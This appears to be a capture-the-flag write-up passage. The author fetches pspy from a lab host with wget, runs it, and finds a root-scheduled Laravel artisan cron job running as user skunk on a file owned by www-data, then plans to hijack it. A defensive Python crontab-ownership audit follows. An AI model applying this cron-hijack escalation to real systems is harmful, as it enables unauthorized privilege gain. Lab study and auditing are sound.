PSPY
A root cronjob process was discovered.
www-data@debian:/var/tmp$ wget -q http://192.168.45.249/pspy64 ; chmod 755 ./pspy64
Delivery complete
www-data@debian:/var/tmp$ ./pspy64 &
[1] 16603
www-data@debian:/var/tmp$ pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
Laravel cronjob being executed as the skunk user;
- It executes the /var/www/html/lavita/artisan PHP file with the clear:pictures argument
  - which removes everything in the /var/www/html/lavita/public/images directory
artisan
www-data@debian:/var/www/html/lavita$ ll /var/www/html/lavita/artisan
4.0K -rwxr-xr-x 1 www-data www-data 1.7K Nov 10 2020 /var/www/html/lavita/artisan
The /var/www/html/lavita/artisan file is OWNED by the current user; www-data
This would mean that I could hijack the PHP file to get code execution as the skunk user, leveraging the cronjob.
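
The root cause noted above is a cron job that runs as one account while the script it executes is owned by another. The following audit for that condition in /etc/crontab-style entries is an added example, not part of the original notes; the crontab line's schedule and the injected file metadata are constructed, while the users and paths are the ones from the notes.

```python
import os
import pwd
import shlex
import stat
from collections import namedtuple

FileMeta = namedtuple("FileMeta", "owner mode")

def stat_meta(path):
    """Real lookup used by default; callers may inject their own."""
    st = os.stat(path)
    return FileMeta(pwd.getpwuid(st.st_uid).pw_name, st.st_mode)

def parse_system_crontab(text):
    """Yield (run_as_user, argv) from lines with 5 time fields + user + command."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#@":
            continue  # skip blanks, comments, @reboot-style entries
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:
            continue  # environment assignment or malformed line
        yield fields[5], shlex.split(fields[6])

def audit(text, lookup=stat_meta):
    """Flag absolute paths in cron commands that another account can modify."""
    findings = []
    for user, argv in parse_system_crontab(text):
        for arg in (a for a in argv if a.startswith("/")):
            try:
                meta = lookup(arg)
            except (OSError, KeyError):
                continue  # path missing or uid without a passwd entry
            reasons = []
            if meta.owner not in (user, "root"):
                reasons.append(f"owned by {meta.owner}")
            if meta.mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group/world-writable")
            if reasons:
                findings.append((user, arg, ", ".join(reasons)))
    return findings

# Constructed sample: the schedule is assumed, user and paths come from the notes.
SAMPLE = "* * * * * skunk php /var/www/html/lavita/artisan clear:pictures\n"

def fake_lookup(path):  # constructed metadata matching the ls output above
    return FileMeta("www-data", 0o100755)

if __name__ == "__main__":
    for user, path, why in audit(SAMPLE, fake_lookup):
        print(f"cron job running as {user} executes {path}: {why}")
```

Parent directory ownership is not checked here; a directory writable by another account allows the same file replacement.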